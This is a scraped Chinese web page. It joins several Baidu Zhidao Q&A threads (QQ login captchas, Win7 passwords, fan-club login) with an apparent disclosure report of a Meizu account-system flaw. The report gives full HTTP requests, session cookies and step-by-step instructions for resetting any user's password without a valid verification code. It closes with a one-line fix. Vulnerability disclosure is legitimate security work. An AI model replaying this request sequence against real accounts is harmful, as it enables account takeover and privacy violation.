来源:蜘蛛抓取(WebSpider)
时间:2015-11-07 01:15
标签:
nextcraft吧
为什么最近登录QQ总要填验证码?_百度知道
为什么最近登录QQ总要填验证码?
在两个不桶的地方都一样,我朋友登录也要输入验证码!
提问者采纳
也很重要。 不要因为只是来iclub问问问题。 ~
(1),就随意设置密码,保护你自己的密码也是保护你自己,CSDN网站用户登录用的是GIF格式,随机的一数字字符串,每刷新一次:不少网站为了防止用户利用机器人自动注册。所谓验证码,图片里加上一些干扰象素(防止OCR),免得你的账号给人盗用给自己带来不必要的麻烦,输入表单提交网站验证。但我们还是提醒大家主要保护自己的密码,验证作用比上一个好,随机英文字母+随机颜色+随机位置+随机长度.常见的验证码
1,验证成功后才能使用某项功能、灌水,人眼看起来都费劲,不可破。主要为了你的QQ安全。二像百度贴吧未登录发贴要输入验证码大概是防止大规模匿名回帖的发生目前,好像就在论坛里发布了。图片上的字符比较中规中矩,不少网站为了防止用户利用机器人自动注册,QQ网站用户登录用的是PNG格式,内容随机,生成一幅图片,目前常用的随机数字图片验证码,不要使用诸如1234之类的简单密码或者与用户名相同、灌水。 没错。所谓验证码,MS的hotmail申请时候的是BMP格式,验证作用几乎为零,就是将一串随机产生的数字或符号,生成一幅图片。
验证码的作用。6,四位数字,但是对社区还来说这个功能还是很有必要.验证码一般是防止批量注册的.一般注册用户ID的地方以及各大论坛都要要输入验证码
(3),也是没有办法的事。2。没有基本图形图像学知识的人!可惜读取它的程序,但是已不能用QQ原版(版本过低),都采用了验证码技术。
(4)意义!
3, 图片里加上一些干扰象素(防止OCR)!有时候出来的图片,输入表单提交网站验证,整个构图有点张扬。以前版本可以不用。虽然登陆麻烦一点,厉害啊…4, 随机数字+随机大写英文字母+随机干扰像素+随机位置,实际上是用验证码是现在很多网站通行的方式(比如招商银行的网上个人银行,Google的Gmail注册时候的是JPG格式,其他各大论坛的是XBM格式,用破解版的可以,都采用了验证码技术,真是可怜,由用户肉眼识别其中的验证码信息,验证成功后才能使用某项功能短时间内你的QQ在2个城市以上出现过登陆情况吧,腾讯的QQ社区)。
5。比如什么珊瑚虫版就可以不用验证码,人眼都识别不了,何况是机器,就是将一串随机产生的数字或符号:有效防止这种问题对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,我们利用比较简易的方式实现了这个功能,图片用的随机数字+随机大写英文字母,每个字符还会变位置呢,尽量使用混杂了数字、类似的密码、字母,由用户肉眼识别其中的验证码信息、符号在内的6位以上密码。
(2)、登录,最原始的验证码,在CSDN使用它的第一天、登录,QQ2007都是要输入验证码才可以登入。所以虽然麻烦
其他类似问题
为您推荐:
登录qq的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁win7家庭正版无法删除登入密码,不要说什么本地用户和组策略,win7家庭版没有。有没有直接修改注册表的。_百度知道
win7家庭正版无法删除登入密码,不要说什么本地用户和组策略,win7家庭版没有。有没有直接修改注册表的。
win7家庭版不用许置空。至于删除密码选项也不行,1楼解决方案控制面板用户账户肯定不能改。XP是修改密码置空就等于删除了密码;或账户策略必须要求账户有一个密码。可以设置为自动登入,能改还问,是不能删除密码的。问题已解决,密码/,系统提示windows不能删除密码
提问者采纳
你是直接进入系统
无需按回车??WIN键 +R 进入 运行
输入control userpasswords2然后你就知道了
提问者评价
其他类似问题
为您推荐:
其他2条回答
在控制面板里找到“用户帐户和家庭安全”在进入“用户帐户”里面更改用户密码,先输入现在的密码,新密码以及新密码确认不要填就好了 密码就删除了
废话,怎么会删除不了?除非你电脑有问题,用户帐户管理里没有删除登陆密码的项吗?自己在控制面板里好好找找吧
win7的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁为什么更换百度帐号登入输入验证码就变成原来的帐号了_百度知道
度有自检功能,在登录新帐号前,看看右上面有没有已经登录的帐号,如果有需要先退出。登录其他号要填验证码,才能再登录其他号
首先,您的账号可能存在安全隐患如异地登陆。其次,你的账号可能经常被举报投诉。要不然就是你密码或验证码老输错.
把你所用的浏览器删除,记得要删除干净,特别是删除的时候会提示是否删除备份的账号密码这一项。删除后重新安装浏览器应该就好了
其他类似问题
为您推荐:
百度帐号的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁现场加入罗志祥sfc怎么登入,要填什么_百度知道
现场加入罗志祥sfc怎么登入,要填什么
提问者采纳
去sfc官网有加入sfc的步骤,要汇款,等等。
提问者评价
其他类似问题
为您推荐:
其他2条回答
现场加入后 SFC会给专属的账号和登入密码你 有了这2个东西 你就可以登录罗志祥国际歌迷会了 也就是SFC
要进入SFC要先交会费有自己的编号才能在SFC官网登陆
您可能关注的推广回答者:
sfc的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁魅族的账号系统内存在漏洞可导致任意账户的密码重置 - 网站安全 - 红黑联盟
魅族的账号系统内存在漏洞可导致任意账户的密码重置
魅族的密码找回系统存在缺陷,可绕过验证码从而重置任意账号密码,进而导致隐私泄露等不良后果
1.首先进入这里,魅族的密码重置模块
/forgetpwd
2.然后我们需要获取的是四种功能模块的包,分别是发送验证码,验证验证码是否正确的,以及获取令牌和重置密码的,这里我都获取好了,接下来我们直接用
发送验证码:
POST /uc/system/vcode/sendEmailVcode HTTP/1.1
Connection: keep-alive
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/web/forgetpwd/toMail?account=&&&&&&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
Cookie: _fgpwdtk=AXTK4CkEUfVC_C1NDGumKyOL6r_8-5kM3oRskFNFuOjRX8Z-WKSowkbe1MkEq6uNUEqtX9fxR9wgFq9bOoEi73xsAVRurOfKThdEJiZEEeQ0ELOzCuIMJlm9YMpMQhdcQT8xwDBBRtV7z08WGayOKv0HJszxDvS3s0F0Zdx9-QM*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw5GNswWeGpzqQCFbdxcT_rLeVU4_l_MIS2c8C_NpSiowUz7LMNB3RG5mmu3InK7R9qAfPpI4Cb5hMh5Ynq13Vv11y46d4LW-AaGqon48D06CA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
email=&vCodeTypeValue=8&account=&&&&&&&&&&&&
验证验证码是否正确:
POST /uc/system/ode/isValidEmailVCodeForForgetPwd HTTP/1.1
Connection: keep-alive
Content-Length: 77
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/webjsp/forgetpwd/toMail?account=&&&&&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
Cookie: _fgpwdtk=AXTK4CkEUfVC_C1NDGumKyOL6r_8-5kM3oRskFNFuOjRX8Z-WKSowkbe1MkEq6uNUEqtX9fxR9wgFq9bOoEi73xsAVRurOfKThdEJiZEEeQ0ELOzCuIMJlm9YMpMQhdcQT8xwDBBRtV7z08WGayOKv0HJszxDvS3s0F0Zdx9-QM*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw5GNswWeGpzqQCFbdxcT_rLeVU4_l_MIS2c8C_NpSiowUz7LMNB3RG5mmu3InK7R9qAfPpI4Cb5hMh5Ynq13Vv11y46d4LW-AaGqon48D06CA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
account=&&&&&&&&&&&&vCodeTypeValue=8&email=&vcode=707054
获取令牌:
POST /security/resubmit/token/get HTTP/1.1
Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Referer: /uc/system/webjsp/forgetpwd/toResetPwd?account=&&&&&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
Cookie: JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m; _fgpwdtk=PUF6F7bafqhWDa7pLRN-9G8pLVkM-ZOBb4lWiGtpuE7mpSGuCe0xElXwO059Ix2M35TSAUSgLDa2ZjDCKav3_hBcJObQo4580cuHuVw9nYOxsLJzyqRR5Tuoqmf0cEYG0TstMaLoTDOl4IqMOf3epsmhdjWMBKQCaZscRQa0xfs*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw4n6yE2ipq2dz-CtbX82Vj0Oad4x92et5f9vMdPm4hHI8jUZhujmD1YhvTHdQwnP583IuC0_lbQ23FJm0i5vQhRky9fCc0moGahkWAVTl_MXA
重置密码:
POST /uc/system/webjsp/forgetpwd/resetPwd HTTP/1.1
Connection: keep-alive
Content-Length: 125
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/webjsp/forgetpwd/toResetPwd?account=&&&&&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
Cookie: _fgpwdtk=PUF6F7bafqhWDa7pLRN-9G8pLVkM-ZOBb4lWiGtpuE7mpSGuCe0xElXwO059Ix2M35TSAUSgLDa2ZjDCKav3_hBcJObQo4580cuHuVw9nYOxsLJzyqRR5Tuoqmf0cEYG0TstMaLoTDOl4IqMOf3epsmhdjWMBKQCaZscRQa0xfs*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw4n6yE2ipq2dz-CtbX82Vj0Oad4x92et5f9vMdPm4hHI8jUZhujmD1YhvTHdQwnP583IuC0_lbQ23FJm0i5vQhRky9fCc0moGahkWAVTl_MXA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
form_resubmit_token_key=KH001S0NAMJE0HFNWTS2WNBTKDP57QVL&account=&&&&&&&&&&&&resetPassword=laofuck&repeatPassword=laofuck
OK,准备齐全了,下面就给大家做现场的表演
1.首先我的目标账号是我朋友LANCE的账号(在这里特别感谢他允许我使用他的账号来测试)130&&&&&&&&
2.同样的我们进入那个账号查找页面,然后这样把账号填进去,进到这个页面
3.这时我们回到抓包那里,把COOKIE干出来
Cookie: Hm_lvt_2a0c994cfcacf4c122e9=; Hm_lpvt_2a0c994cfcacf4c122e9=; _ga=GA1.2..; rememberLogin=; accountLogin=; passwordLogin=; _uid=; _keyLogin=; _uticket=; _islogin=; JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
这里我们需要的是这一段
JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
4.再拿出我们之前抓的找回密码那个包,我们替换些信息进去
POST /uc/system/vcode/sendEmailVcode HTTP/1.1
Connection: keep-alive
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/webjsp/forgetpwd/toMail?account=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
email=&vCodeTypeValue=8&account=130&********
注意,我这里替换的是COOKIE以及下面的账号那里,邮箱你要填上自己的
然后,就发送出去吧
5.然后我们的邮箱里收到了这封东西
130&&&&&&&,您好:
感谢您使用Flyme服务。
您正在进行Flyme找回密码操作,请在30分钟内将此验证码:991344 输入验证码输入框,以完成验证。
Flyme 项目组
把上面的验证码记下,我们继续玩
6.然后这里,我们来验证一下是否正确,同样的记住替换COOKIE和信息
验证验证码是否正确:
POST /uc/system/vcode/isValidEmailVCodeForForgetPwd HTTP/1.1
Connection: keep-alive
Content-Length: 77
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/webjsp/forgetpwd/toMail?account=&&&&&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
account=130&&&&&&&&&vCodeTypeValue=8&email=&vcode=991344
返回是错误的,但不要在意,我们继续走
7.这时,我们来获取令牌了,记得把该替换的东西都替换了
POST /security/resubmit/token/get HTTP/1.1
Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Referer: /uc/system/webjsp/forgetpwd/toResetPwd?account=130&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
返回的是这些
{&code&:&200&,&message&:&&,&redirect&:&&,&value&:&JUG2VL7VKRDDZ156UZSXQ92TIOFWUY0L&}
我们需要的是value
8.然后,最后,我们替换好该替换的东西,重置密码吧!
POST /uc/system/webjsp/forgetpwd/resetPwd HTTP/1.1
Connection: keep-alive
Content-Length: 125
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: /uc/system/webjsp/forgetpwd/toResetPwd?account=130&&&&&&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8
JSESSIONID=m2cpjjkteivjxr1o9d646 _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
form_resubmit_token_key=JUG2VL7VKRDDZ156UZSXQ92TIOFWUY0L&account=130&&&&&&&&resetPassword=xibaxiba&repeatPassword=xibaxiba
OK,我们看到的,返回的是200和true,就是说我们成功的重置了密码
9.登陆试试
修复方案:
加强各模块的验证
